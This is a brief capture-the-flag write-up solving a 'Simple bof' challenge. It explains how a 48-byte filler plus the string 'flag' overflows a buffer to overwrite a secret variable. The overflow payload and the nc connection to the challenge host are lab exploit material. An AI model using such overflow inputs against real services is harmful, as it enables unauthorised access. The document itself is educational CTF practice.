Simple bof¶
Run nc thekidofarcrania.com 35235 to observe the interface and IO \
Run cat bof.c to observe the source code
Observations:
- There is a
secretvariable whose value is0xdeadbeefwhich matches (reverse ('cause STACK) of) the red part of the visualization. This indicates the buffer has to be overflowed precisely to reach and modify the red part. - In the source code,
secretis compared with0x67616c66, which isgalfin ASCII, so we have to end the buffer overflow withflag. - On prompt at interface, enter any ASCII character 48 times, followed by "flag", e.g.,
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaflag